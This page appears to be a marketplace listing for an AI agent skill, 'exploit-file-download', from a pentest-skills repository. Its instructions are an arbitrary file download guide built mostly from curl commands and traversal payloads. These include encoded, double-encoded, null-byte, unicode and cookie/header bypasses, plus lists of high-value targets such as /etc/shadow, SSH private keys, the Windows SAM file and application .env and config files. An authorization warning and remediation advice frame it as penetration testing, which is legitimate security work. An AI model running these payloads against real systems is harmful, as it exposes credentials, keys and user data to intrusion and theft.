Run any Skill in Manus with one click

$pwd:

exploit-file-download

Name: Exploit File Download
Author: crazyMarky

// Arbitrary file download vulnerability detection and exploitation using path traversal techniques, bypass methods, and sensitive file discovery. Use this skill when user needs to test for file download vulnerabilities, path traversal, or read sensitive files on target systems.

Run Skill in Manus

$ git log --oneline --stat

stars:170

forks:16

updated:February 15, 2026 at 04:25

File Explorer

3 files

SKILL.md

readonly

related-skills.json

same repository

pentest-report.md

from "crazyMarky/pentest-skills"

按照标准格式生成渗透测试报告，包含项目信息表、漏洞发现清单、漏洞详情（含属性表、描述、复现步骤、证据截图、修复建议）、附录（风险等级定义、CVSS说明、词汇表）。当用户要求生成渗透测试报告、安全测试报告、漏洞报告时使用此技能。严格遵循项目模板目录中的标准格式。

2026-03-06170

exploit-file-download.md

from "crazyMarky/pentest-skills"

任意文件下载与本地文件包含 (LFI) 漏洞检测和利用工具。使用 curl、ffuf、wget 等工具测试文件下载漏洞，支持路径遍历、伪协议利用、敏感文件读取。当用户需要测试文件下载功能、检测 LFI 漏洞、读取服务器敏感文件时使用此技能。

2026-03-05170

exploit-lfi.md

from "crazyMarky/pentest-skills"

本地文件包含 (LFI) 漏洞检测和利用工具。使用 curl、ffuf 等工具测试 LFI 漏洞，支持路径遍历、PHP 伪协议利用、日志投毒 RCE、敏感文件读取。当用户需要检测 LFI 漏洞、利用文件包含漏洞读取服务器文件时使用此技能。

2026-03-05170

exploit-sqli.md

from "crazyMarky/pentest-skills"

SQL injection detection and exploitation using sqlmap, manual techniques, and custom payloads. Use this skill when user needs to test for SQL injection vulnerabilities, extract database information, or exploit SQLi in parameters, headers, or cookies.

2026-02-15170

exploit-xss.md

from "crazyMarky/pentest-skills"

Cross-site scripting (XSS) vulnerability detection and exploitation. Supports reflected XSS, stored XSS, DOM-based XSS, and blind XSS testing. Use this skill when user mentions XSS, cross-site scripting, script injection, or needs to test JavaScript injection in parameters, forms, headers, or DOM sources.

2026-02-15170

recon-dir-scan.md

from "crazyMarky/pentest-skills"

Directory and file enumeration using ffuf, gobuster, dirsearch, and feroxbuster. Use this skill when user needs to discover hidden directories, enumerate files, find backup files, or map application structure through path fuzzing.

2026-02-15170

package.json

"author": "crazyMarky"

"repository": "crazyMarky/pentest-skills"

View GitHub Repository View Creator Repositories

$ install --global

$ download --local

Run Skill in Manus

$ useful --forSOC

Computer Occupations, All OtherComputer and Mathematical Occupations15-1299L4

name	exploit-file-download
description	Arbitrary file download vulnerability detection and exploitation using path traversal techniques, bypass methods, and sensitive file discovery. Use this skill when user needs to test for file download vulnerabilities, path traversal, or read sensitive files on target systems.

Arbitrary File Download Detection & Exploitation

Authorization Warning

DANGER: File download vulnerability testing can expose sensitive system files and user data. Always ensure you have:

Written permission from the target system owner
Isolated testing environment
Defined scope of testing
Legal compliance with local regulations

Never test file download vulnerabilities on production systems without authorization.

Prerequisites

Required Tools

# Python 3 with requests library
pip install requests

# Optional: curl for manual testing
# Built-in on most systems

Optional Tools

# Burp Suite for manual testing
# OWASP ZAP for automated scanning
# ffuf for parameter fuzzing

Quick Start

Basic Path Traversal Test

# Manual test with curl
curl "https://target.com/download?file=../../../etc/passwd"

# Using the automated tester
python scripts/file_download_tester.py -u "https://target.com/download?file=document.pdf"

Sensitive File Scanner

# Scan for sensitive files after confirming vulnerability
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

Common Scenarios

1. Basic Path Traversal Testing

Test for basic directory traversal vulnerabilities:

# Manual testing
curl "https://target.com/download?file=../../../etc/passwd"
curl "https://target.com/download?file=....//....//etc/passwd"

# Automated testing
python scripts/file_download_tester.py -u "https://target.com/download?file=test.pdf"

What to check:

Does the parameter accept ../ sequences?
Can you access files outside the intended directory?
What is the response when accessing system files?

Common payload patterns:

../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini

2. URL Encoded Bypass

When basic traversal is blocked, try URL encoding:

# Single URL encoding
curl "https://target.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double URL encoding
curl "https://target.com/download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"

Encoding variations:

Type	Payload
URL encoded	`%2e%2e%2f`
Double encoded	`%252e%252e%252f`
Mixed	`..%2f..%2f`

3. Null Byte Injection

When extension validation exists:

# Null byte to truncate extension check
curl "https://target.com/download?file=../../../etc/passwd%00.jpg"
curl "https://target.com/download?file=../../../etc/passwd%00.png"

Works against:

Simple extension validation
Some path sanitization filters

4. Unicode/Double Write Bypass

When standard payloads are filtered:

# Unicode encoding
curl "https://target.com/download?file=..%c0%af..%c0%af..%c0%afetc/passwd"

# Double write (....//)
curl "https://target.com/download?file=....//....//....//etc/passwd"

# Mixed separators
curl "https://target.com/download?file=..%5c..%5c..%5cetc/passwd"

5. Sensitive File Discovery

After confirming vulnerability, discover sensitive files:

# Linux targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

# Windows targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os windows

# Custom file list
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --wordlist custom_files.txt

High-value targets (Linux):

/etc/passwd          - User accounts
/etc/shadow          - Password hashes (requires root)
/etc/hosts           - Host mappings
/proc/self/environ   - Environment variables
/var/log/apache2/access.log - Access logs
/home/user/.ssh/id_rsa - SSH private keys
/var/www/html/config.php - Web app configs

High-value targets (Windows):

C:\Windows\win.ini           - Windows configuration
C:\Windows\System32\config\SAM - User accounts
C:\inetpub\wwwroot\web.config - IIS configuration
C:\Users\Administrator\.ssh\id_rsa - SSH keys

6. Application Config Discovery

Target web application configuration files:

# Common web app configs
../../../var/www/html/config.php
../../../var/www/html/wp-config.php
../../../app/config/database.yml
../../../.env
../../../web.config

Framework-specific paths:

Framework	Config Path
WordPress	`wp-config.php`
Laravel	`.env`
Django	`settings.py`
ASP.NET	`web.config`
Spring	`application.properties`

7. POST Request Testing

Test POST parameters for file download:

# Save request to file
cat > request.txt << 'EOF'
POST /download HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

file=document.pdf
EOF

# Test with curl
curl -X POST "https://target.com/download" -d "file=../../../etc/passwd"

8. Cookie/Header Testing

Test non-parameter injection points:

# Cookie parameter
curl "https://target.com/download" --cookie "filename=../../../etc/passwd"

# Custom header
curl "https://target.com/download" -H "X-File-Path: ../../../etc/passwd"

# Referer header
curl "https://target.com/download" -H "Referer: https://target.com/?file=../../../etc/passwd"

Tool Selection Guide

Scenario	Tool	Command
Quick manual test	curl	`curl "URL?file=../../../etc/passwd"`
Automated scanning	file_download_tester.py	`python scripts/file_download_tester.py -u URL`
Sensitive file scan	sensitive_file_scanner.py	`python scripts/sensitive_file_scanner.py -u URL --os linux`
Parameter fuzzing	ffuf	`ffuf -u "URL?file=FUZZ" -w wordlist.txt`
Custom payload test	curl	`curl "URL?file=$(cat payload.txt)"`

Testing Checklist

Discovery Phase

Identify all download endpoints (URL params, forms, API endpoints)
Test basic path traversal (../)
Check response headers for file type information

Bypass Testing

Sensitive File Testing

Linux system files (/etc/passwd, /etc/shadow)
Windows system files (win.ini, SAM)
Application configs (.env, config.php)
SSH keys (id_rsa, authorized_keys)
Log files (access.log, error.log)
Database files

Post-Exploitation

Document all accessible files
Identify sensitive data exposed
Report severity based on data sensitivity

Resources

Scripts

scripts/file_download_tester.py - Automated vulnerability detection
scripts/sensitive_file_scanner.py - Sensitive file enumeration

Reference Documentation

references/bypass_techniques.md - Detailed bypass methods
references/sensitive_files.md - Comprehensive file lists

Assets/Wordlists

assets/traversal_payloads.txt - Path traversal payloads
assets/linux_sensitive_files.txt - Linux sensitive file paths
assets/windows_sensitive_files.txt - Windows sensitive file paths

External Resources

Reporting Format

When reporting file download vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║         File Download Vulnerability Report            ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/download                   ║
║ Type: Path Traversal                                  ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: file
Payload: ../../../etc/passwd

Proof of Concept:
curl "https://target.com/download?file=../../../etc/passwd"

Files Confirmed Accessible:
- /etc/passwd (user accounts)
- /etc/hosts (network config)
- /var/www/html/config.php (database credentials)

Impact:
- Access to sensitive system files
- Exposure of database credentials
- Potential for further exploitation

Recommendations:
- Implement strict path validation
- Use allowlist for permitted files
- Sanitize user input for path characters
- Use chroot or container isolation

exploit-file-download

More from this repository

More from this repository

Arbitrary File Download Detection & Exploitation

Authorization Warning

Prerequisites

Required Tools

Optional Tools

Quick Start

Basic Path Traversal Test

Sensitive File Scanner

Common Scenarios

1. Basic Path Traversal Testing

2. URL Encoded Bypass

3. Null Byte Injection

4. Unicode/Double Write Bypass

5. Sensitive File Discovery

6. Application Config Discovery

7. POST Request Testing

8. Cookie/Header Testing

Tool Selection Guide

Testing Checklist

Discovery Phase

Bypass Testing

Sensitive File Testing

Post-Exploitation

Resources

Scripts

Reference Documentation

Assets/Wordlists

External Resources

Reporting Format

Arbitrary File Download Detection & Exploitation

Authorization Warning

Prerequisites

Required Tools

Optional Tools

Quick Start

Basic Path Traversal Test

Sensitive File Scanner

Common Scenarios

1. Basic Path Traversal Testing

2. URL Encoded Bypass

3. Null Byte Injection

4. Unicode/Double Write Bypass

5. Sensitive File Discovery

6. Application Config Discovery

7. POST Request Testing

8. Cookie/Header Testing

Tool Selection Guide

Testing Checklist

Discovery Phase

Bypass Testing

Sensitive File Testing

Post-Exploitation

Resources

Scripts

Reference Documentation

Assets/Wordlists

External Resources

Reporting Format